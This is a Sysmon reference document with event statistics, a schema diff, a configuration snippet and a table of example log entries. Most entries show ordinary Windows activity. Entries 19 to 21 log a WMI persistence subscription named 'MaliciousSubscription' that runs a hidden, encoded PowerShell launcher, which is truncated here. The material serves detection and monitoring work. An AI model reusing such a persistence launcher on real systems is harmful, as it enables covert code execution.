Sysmon Versions and Events Repartition
Statistics showing the count of the events generated over a monitoring period of 5h with all the Sysmon events being logged. The event IDs not displayed have simply not been seen during the sampling.
Sysmon v6.x
Start: 2017-09-20T23:15:04Z
Stop: 2017-09-21T04:04:19Z
TimeLastEvent: 2017-09-21T04:04:18Z
Duration (stop - start): 5h0m0.1474609s
EventCount: 1669855
Average EPS: 92.77 eps
EventIDs:
1: 116 (0.01 eps)
2: 6 (0.00 eps)
3: 186 (0.01 eps)
5: 115 (0.01 eps)
6: 4 (0.00 eps)
7: 5850 (0.32 eps)
8: 1 (0.00 eps)
9: 45 (0.00 eps)
10: 1605725 (89.21 eps)
11: 271 (0.02 eps)
12: 50561 (2.81 eps)
13: 3297 (0.18 eps)
17: 10 (0.00 eps)
18: 3668 (0.20 eps)
Sysmon v7.x
Diff in Sysmon schemas between v7.0 and v6.1
diff sysmon-v6.1-schema.xml sysmon-v7.0-schema.xml
1,2c1
<
< <manifest schemaversion="3.4" binaryversion="1.01">
---
> <manifest schemaversion="4.0" binaryversion="1.01">
10a10
> <option switch="s" name="PrintSchema" argument="optional" noconfig="true" exclusive="true" />
17a18
> <option switch="d" name="DriverName" argument="required" />
34a36,39
> <data name="FileVersion" inType="win:UnicodeString" outType="xs:string" />
> <data name="Description" inType="win:UnicodeString" outType="xs:string" />
> <data name="Product" inType="win:UnicodeString" outType="xs:string" />
> <data name="Company" inType="win:UnicodeString" outType="xs:string" />
101a107,110
> <data name="FileVersion" inType="win:UnicodeString" outType="xs:string" />
> <data name="Description" inType="win:UnicodeString" outType="xs:string" />
> <data name="Product" inType="win:UnicodeString" outType="xs:string" />
> <data name="Company" inType="win:UnicodeString" outType="xs:string" />
Start: 2018-01-03T18:59:55Z
Stop: 2018-01-03T19:04:46Z
TimeLastEvent: 2018-01-03T19:04:45Z
Duration (stop - start): 5m0.1181641s
EventCount: 264888
Average EPS: 882.61 eps
EventIDs:
1: 17 (0.06 eps)
2: 3 (0.01 eps)
3: 4 (0.01 eps)
5: 8 (0.03 eps)
7: 252886 (842.62 eps)
9: 6 (0.02 eps)
10: 7673 (25.57 eps)
11: 139 (0.46 eps)
12: 3863 (12.87 eps)
13: 212 (0.71 eps)
17: 8 (0.03 eps)
18: 69 (0.23 eps)
NB: We notice a big increase of ImageLoad events in the latest versions of Sysmon. This is due to the new feature introduced (i.e file information available in event IDs 1 and 7). Actually, the Sysmon process itself needs to load every single image loaded or image of process created in order to extract the file information. To prevent this huge amount of events to impact your workstation/infrastructure, those events need to be filtered out from your Sysmon configuration file.
<!-- Has to be adapted to reflect the path where Sysmon is installed -->
<ImageLoad onmatch="exclude">
<!-- [...] -->
<Image condition="is">C:\Windows\Sysmon.exe</Image>
<!-- [...] -->
</ImageLoad>
Events Table
| EventID | Type | Available Since | Revised In | Example |
|---|---|---|---|---|
| 1 | CreateProcess | - |
v7.0 v10 |
CommandLine: C:\\Windows\\system32\\svchost.exe -k appmodel -p -s camsvc Company: Microsoft Corporation CurrentDirectory: C:\\Windows\\system32\\ Description: Host Process for Windows Services FileVersion: 10.0.18362.1 (WinBuild.160101.0800) Hashes: SHA1=75C5A97F521F760E32A4A9639A653EED862E9C61,MD5=9520A99E77D6196D0D09833146424113,SHA256=DD191A5B23DF92E12A8852291F9FB5ED594B76A28A5A464418442584AFD1E048,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69 Image: C:\\Windows\\System32\\svchost.exe IntegrityLevel: System LogonGuid: {515cd0d1-df83-5d00-0000-0020e7030000} LogonId: 0x3e7 OriginalFileName: svchost.exe ParentCommandLine: C:\\Windows\\system32\\services.exe ParentImage: C:\\Windows\\System32\\services.exe ParentProcessGuid: {515cd0d1-df83-5d00-0000-0010d6620000} ParentProcessId: 608 ProcessGuid: {515cd0d1-33b8-5d01-0000-001024046a00} ProcessId: 10244 Product: Microsoft® Windows® Operating System RuleName: TerminalSessionId: 0 User: NT AUTHORITY\\SYSTEM UtcTime: 2019-06-12 20:17:44.014 |
| 2 | FileCreateTime | - | - |
CreationUtcTime: 2017-09-18 07:50:46.104 Image: C:\\Program Files\\Mozilla Firefox\\firefox.exe PreviousCreationUtcTime: 2017-09-19 21:16:37.524 ProcessGuid: 49F1AF32-8663-59C1-0000-001062293400 ProcessId: 1396 TargetFilename: C:\\Users\\Gen Eric\\AppData\\Roaming\\Microsoft\\Windo ws\\Recent\\CustomDestinations\\BE2KF8TBMP786WCR1WSN.temp UtcTime: 2017-09-19 21:16:37.540 |
| 3 | NetworkConnect | - | - |
DestinationHostname: DestinationIp: 192.168.56.1 DestinationIsIpv6: false DestinationPort: 8080 DestinationPortName: Image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Initiated: true ProcessGuid: 49F1AF32-8A4D-59C1-0000-001042F00A00 ProcessId: 3888 Protocol: tcp SourceHostname: GenEric-PC SourceIp: 192.168.56.101 SourceIsIpv6: false SourcePort: 49252 SourcePortName: User: NT AUTHORITY\\SYSTEM UtcTime: 2017-09-19 21:25:51.846 |
| 4 | - | - | - |
SchemaVersion: 3.40 State: Started UtcTime: 2017-09-19 21:17:08.820 Version: 6.10 |
| 5 | ProcessTerminate | - | - |
Image: C:\\Windows\\SysWOW64\\runonce.exe ProcessGuid: 49F1AF32-8956-59C1-0000-001099830200 ProcessId: 2100 UtcTime: 2017-09-19 21:17:12.434 |
| 6 | DriverLoad | - | - |
Hashes: SHA1=706C6BB3AD9E24F148EE110984814897383BDC32,
MD5=9B38580063D281A99E68EF5813022A5F,
SHA256=D91676B0E0A8E2A090E3E5DD340ABCFC20AE0F55B4C82869D6CFB34239BD27DA,
IMPHASH=6126B7C1BE78663C7C2231BA8607D577 ImageLoaded: C:\\Windows\\System32\\drivers\\dfsc.sys Signature: Microsoft Windows SignatureStatus: Valid Signed: true UtcTime: 2017-09-19 21:17:01.171 |
| 7 | ImageLoad | - |
v7.0 v10 |
Company: Microsoft Corporation Description: Win32u FileVersion: 10.0.18362.1 (WinBuild.160101.0800) Hashes: SHA1=F6826F19BB585A1F52F6D2D2B063BFA175AA5B19,MD5=6D9F4B6D13442736A901BF455355AA8A,SHA256=E2F6F0021EFBBFDA3597DCD4F778BC1954138A6289BA9C0EBED360F37E5FAC9B,IMPHASH=00000000000000000000000000000000 Image: C:\\Windows\\System32\\svchost.exe ImageLoaded: C:\\Windows\\System32\\win32u.dll OriginalFileName: ? ProcessGuid: {515cd0d1-33b8-5d01-0000-001024046a00} ProcessId: 10244 Product: Microsoft® Windows® Operating System RuleName: Signature: Microsoft Windows SignatureStatus: Valid Signed: true UtcTime: 2019-06-12 17:17:44.440 |
| 8 | CreateRemoteThread | - | - |
NewThreadId: 3384 SourceImage: C:\\Windows\\System32\\wbem\\WmiPrvSE.exe SourceProcessGuid: 49F1AF32-8955-59C1-0000-00105DF90100 SourceProcessId: 1956 StartAddress: 0x0000000077533860 StartFunction: StartModule: C:\\Windows\\SYSTEM32\\ntdll.dll TargetImage: C:\\Windows\\System32\\wbem\\WmiApSrv.exe TargetProcessGuid: 49F1AF32-89D7-59C1-0000-00106D100A00 TargetProcessId: 3196 UtcTime: 2017-09-19 21:19:20.228 |
| 9 | RawAccessRead | - | - |
Device: \\Device\\HarddiskVolume2 Image: C:\\Windows\\System32\\smss.exe ProcessGuid: 49F1AF32-894D-59C1-0000-0010002E0000 ProcessId: 264 UtcTime: 2017-09-19 21:17:01.359 |
| 10 | ProcessAccess | - | - |
CallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+4bf9a|C:\\Windows\\system32
\\KERNELBASE.dll+189b7|C:\\Windows\\System32\\VBoxService.exe+1009d|C:\\Windows\
\System32\\VBoxService.exe+11374|C:\\Windows\\System32\\VBoxService.exe+1161e|C:
\\Windows\\System32\\VBoxService.exe+e7fb|C:\\Windows\\System32\\VBoxService.exe
+f27b|C:\\Windows\\System32\\VBoxService.exe+181e|C:\\Windows\\System32\\VBoxSer
vice.exe+2d4af|C:\\Windows\\System32\\VBoxService.exe+30bd2|C:\\Windows\\System3
2\\VBoxService.exe+6c24b|C:\\Windows\\System32\\VBoxService.exe+6c2df|C:\\Window
s\\system32\\kernel32.dll+159cd|C:\\Windows\\SYSTEM32\\ntdll.dll+2a561 GrantedAccess: 0x1400 SourceImage: C:\\Windows\\System32\\VBoxService.exe SourceProcessGUID: 49F1AF32-4E56-59BD-0000-00108BCA0000 SourceProcessId: 664 SourceThreadId: 696 TargetImage: C:\\Windows\\system32\\csrss.exe TargetProcessGUID: 49F1AF32-4E55-59BD-0000-0010FB560000 TargetProcessId: 340 UtcTime: 2017-09-19 21:14:34.790 |
| 11 | FileCreate | - | - |
CreationUtcTime: 2017-09-07 21:43:40.859 Image: C:\\Windows\\System32\\smss.exe ProcessGuid: 49F1AF32-894D-59C1-0000-0010002E0000 ProcessId: 264 TargetFilename: C:\\pagefile.sys UtcTime: 2017-09-19 21:17:02.343 |
| 12 | RegistryEvent | - | - |
EventType: CreateKey Image: C:\\Windows\\Sysmon.exe ProcessGuid: 49F1AF32-4E59-59BD-0000-001021720100 ProcessId: 1332 TargetObject: HKU\\.DEFAULT\\SOFTWARE\\Policies\\Microsoft\\SystemCerti ficates\\Disallowed\\CRLs UtcTime: 2017-09-19 21:14:42.915 |
| 13 | RegistryEvent | - | - |
Details: DWORD (0xffffffff) EventType: SetValue Image: C:\\Windows\\system32\\CompatTelRunner.exe ProcessGuid: 49F1AF32-884D-59C1-0000-001093F04800 ProcessId: 616 TargetObject: \\REGISTRY\\A\\{5F82DC26-E525-476B-D7F4-86FAF0C848CE}\\Ro ot\\DeviceCensus\\WU\\AppStoreAutoUpdatePolicy UtcTime: 2017-09-19 21:12:46.212 |
| 14 | RegistryEvent | - | - |
EventType: RenameKey Image: C:\\Windows\\regedit.exe NewName: \\REGISTRY\\MACHINE\\SOFTWARE\\Macromedia\\RegistryRenamed ProcessGuid: 49F1AF32-22C3-59C2-0000-001085501200 ProcessId: 3800 TargetObject: HKLM\\SOFTWARE\\Macromedia\\FlashPlayerActiveX UtcTime: 2017-09-20 08:14:21.370 |
| 15 | FileCreateStreamHash | - | - |
CreationUtcTime: 2017-09-20 08:06:11.801 Hash: SHA1=17DC34358A2BF7E7D6E78268B3CA7493915BB325, MD5=9D9D384EF6546192D60EFDBB8397CD2D, SHA256=3455A37D9006F5325AC6208E874AE8149FECD8631D981EE78B3AD5B06AD648AB, IMPHASH=00000000000000000000000000000000 Image: C:\\Windows\\system32\\cmd.exe ProcessGuid: 49F1AF32-21E3-59C2-0000-00106B811000 ProcessId: 4000 TargetFilename: C:\\Users\\GENERI~1\\AppData\\Local\\Temp\\test.txt:mal icious.txt UtcTime: 2017-09-20 08:10:29.925 |
| 16 | - | - | - | Not Seen |
| 17 | PipeEvent | v6.0 |
v10 |
EventType: CreatePipe Image: C:\\Program Files\\Whids\\Whids.exe PipeName: <Anonymous Pipe> ProcessGuid: {515cd0d1-33b1-5d01-0000-0010286f6900} ProcessId: 10004 RuleName: UtcTime: 2019-06-12 20:19:19.517 |
| 18 | PipeEvent | v6.0 |
v10 |
EventType: ConnectPipe Image: C:\\Windows\\System32\\RuntimeBroker.exe PipeName: \\MsFteWds ProcessGuid: {515cd0d1-dfb4-5d00-0000-001013af0900} ProcessId: 5012 RuleName: UtcTime: 2019-06-12 20:17:53.895 |
| 19 | WmiEvent | v6.10 | - |
EventNamespace: \root\\\\CimV2\ EventType: WmiFilterEvent Name: \MaliciousSubscription\ Operation: Created Query: \SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE Targ etInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.System UpTime >= 240 AND TargetInstance.SystemUpTime < 325\ User: GenEric-PC\\Gen Eric UtcTime: 2017-09-19 21:10:00.401 |
| 20 | WmiEvent | v6.10 | - |
Destination: \C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\
\\powershell.exe -NonI -W hidden -enc JABHAHIAbwBVAFAAUABvAGwAaQBjAHkAUwBlAFQAVA
[...] AkAEsAKQApAHwASQBFAFgA\ EventType: WmiConsumerEvent Name: \MaliciousSubscription\ Operation: Created Type: Command Line User: GenEric-PC\\Gen Eric UtcTime: 2017-09-19 21:10:00.431 |
| 21 | WmiEvent | v6.10 | - |
Consumer: \CommandLineEventConsumer.Name=\\\MaliciousSubscription\\\\ EventType: WmiBindingEvent Filter: \__EventFilter.Name=\\\MaliciousSubscription\\\\ Operation: Created User: GenEric-PC\\Gen Eric UtcTime: 2017-09-19 21:10:11.878 |
| 22 | DNSQuery | v10 | - |
Image: C:\\Windows\\SystemApps\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\MicrosoftEdge.exe ProcessGuid: {515cd0d1-31d1-5d01-0000-001066414800} ProcessId: 5188 QueryName: rawsec.lu QueryResults: ::ffff:62.210.16.62; QueryStatus: 0 RuleName: UtcTime: 2019-06-12 19:08:38.387 |